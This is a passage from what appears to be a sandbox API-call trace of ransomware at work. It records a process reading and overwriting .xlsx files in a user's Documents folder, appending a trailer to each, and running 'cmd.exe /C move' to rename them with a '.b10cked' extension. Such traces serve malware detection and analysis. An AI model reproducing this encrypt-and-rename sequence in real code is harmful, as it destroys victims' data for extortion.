lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0131.251] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.251] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14b7a [0131.251] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.251] QueryPerformanceCounter (in: 
lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=18803989747) returned 1 [0131.251] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.251] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14b7a [0131.251] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.251] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.251] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14b7a [0131.251] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.251] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0131.251] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x14b7a [0131.251] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0131.251] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.251] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14b7a [0131.251] SetFilePointer (in: hFile=0x114, 
lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.251] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.251] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14b7a [0131.251] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.252] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.252] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14b7a [0131.252] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.252] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.252] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14b7a [0131.252] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.252] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.252] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14b7a [0131.252] 
SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.252] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.252] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14b7a [0131.252] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.252] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x14692 [0131.252] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0131.253] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0131.254] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0131.254] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x14b7a [0131.254] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0131.254] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0131.254] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0131.254] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x14b7a [0131.254] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0131.254] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0131.254] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xa5bc, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xa5bc, lpOverlapped=0x0) returned 1 [0131.255] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0131.255] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xa5bc, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xa5bc, lpOverlapped=0x0) returned 1 [0131.255] SetFilePointer (in: hFile=0x114, lDistanceToMove=-42428, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xa5be [0131.255] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xa5bc, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xa5bc, lpOverlapped=0x0) returned 1 [0131.255] SetFilePointer (in: hFile=0x114, lDistanceToMove=-42428, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xa5be [0131.255] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xa5bc, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, 
lpNumberOfBytesWritten=0x12ec1c*=0xa5bc, lpOverlapped=0x0) returned 1 [0131.259] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Muum.xlsx", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0131.259] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Muum.xlsx", cchWideChar=9, lpMultiByteStr=0x131326c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Muum.xlsx", lpUsedDefaultChar=0x0) returned 9 [0131.259] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x14b7a [0131.259] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0131.260] CloseHandle (hObject=0x114) returned 1 [0131.261] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\Muum.xlsx", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\MUUM~1.XLS") returned 0x24 [0131.261] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\") returned 0x1a [0131.261] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\MUUM~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\Muum.xlsx.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, 
cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\MUUM~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\Muum.xlsx.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0xa54, dwThreadId=0x9b4)) returned 1 [0131.281] CloseHandle (hObject=0x110) returned 1 [0131.281] CloseHandle (hObject=0x114) returned 1 [0131.281] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\", cchLength=0x1b | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\") returned 0x1b [0131.281] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\", cchLength=0x1b | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\") returned 0x1b [0131.281] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\", cchCount1=27, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\", cchCount2=27) returned 2 [0131.281] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0131.281] ReleaseMutex (hMutex=0xf8) returned 1 [0131.281] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0131.281] ReleaseMutex (hMutex=0xf8) returned 1 [0131.281] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0131.281] ReleaseMutex (hMutex=0xf8) returned 1 [0131.281] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0131.281] ReleaseMutex (hMutex=0xf8) returned 1 [0131.281] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\qFL-bVPAqe.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\qfl-bvpaqe.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0131.281] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.281] 
SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x139e6 [0131.282] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.282] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=18807082601) returned 1 [0131.282] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.282] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x139e6 [0131.282] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.282] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.282] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x139e6 [0131.282] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.282] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0131.282] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x139e6 [0131.282] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0131.282] 
SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.282] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x139e6 [0131.282] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.282] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.282] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x139e6 [0131.282] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.282] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.282] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x139e6 [0131.283] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.283] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.283] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x139e6 [0131.283] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.283] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.283] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x139e6 [0131.283] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.283] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.283] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x139e6 [0131.283] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0131.283] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x134fe [0131.283] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0131.284] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0131.284] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0131.284] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x139e6 [0131.284] SetFilePointer 
(in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0131.284] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0131.284] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0131.284] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x139e6 [0131.284] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0131.284] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0131.285] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x9cf2, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x9cf2, lpOverlapped=0x0) returned 1 [0131.285] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0131.285] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x9cf2, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x9cf2, lpOverlapped=0x0) returned 1 [0131.285] SetFilePointer (in: hFile=0x114, lDistanceToMove=-40178, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x9cf4 [0131.285] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x9cf2, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x9cf2, 
lpOverlapped=0x0) returned 1 [0131.286] SetFilePointer (in: hFile=0x114, lDistanceToMove=-40178, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x9cf4 [0131.286] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x9cf2, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x9cf2, lpOverlapped=0x0) returned 1 [0131.290] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="qFL-bVPAqe.xlsx", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0131.290] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="qFL-bVPAqe.xlsx", cchWideChar=15, lpMultiByteStr=0x131322c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="qFL-bVPAqe.xlsx", lpUsedDefaultChar=0x0) returned 15 [0131.290] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x139e6 [0131.290] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0131.290] CloseHandle (hObject=0x114) returned 1 [0131.291] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\qFL-bVPAqe.xlsx", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\QFL-BV~1.XLS") returned 0x26 [0131.291] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\") returned 0x1a [0131.292] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\QFL-BV~1.XLS\" 
\"C:\\Users\\EEBsYm5\\DOCUME~1\\qFL-bVPAqe.xlsx.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\QFL-BV~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\qFL-bVPAqe.xlsx.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0x990, dwThreadId=0x98c)) returned 1 [0131.296] CloseHandle (hObject=0x110) returned 1 [0131.296] CloseHandle (hObject=0x114) returned 1 [0131.296] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\", cchLength=0x1b | out: 